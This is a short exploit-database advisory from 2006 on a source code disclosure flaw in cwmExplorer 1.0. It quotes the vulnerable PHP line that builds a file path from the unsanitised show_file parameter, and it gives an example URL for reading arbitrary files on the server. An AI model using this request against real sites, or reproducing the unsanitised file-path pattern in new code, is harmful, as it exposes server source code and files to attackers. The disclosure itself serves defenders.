id: 1277
date: 12/19/2006
title: cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability
author: ajann
cves: 

================================================================
cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability
================================================================



*******************************************************************************************
# Title   :  cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
$datei = "dirs/".$d."/".$_GET[show_file];
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/index.php?d=0&show_file=[file]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-27]  #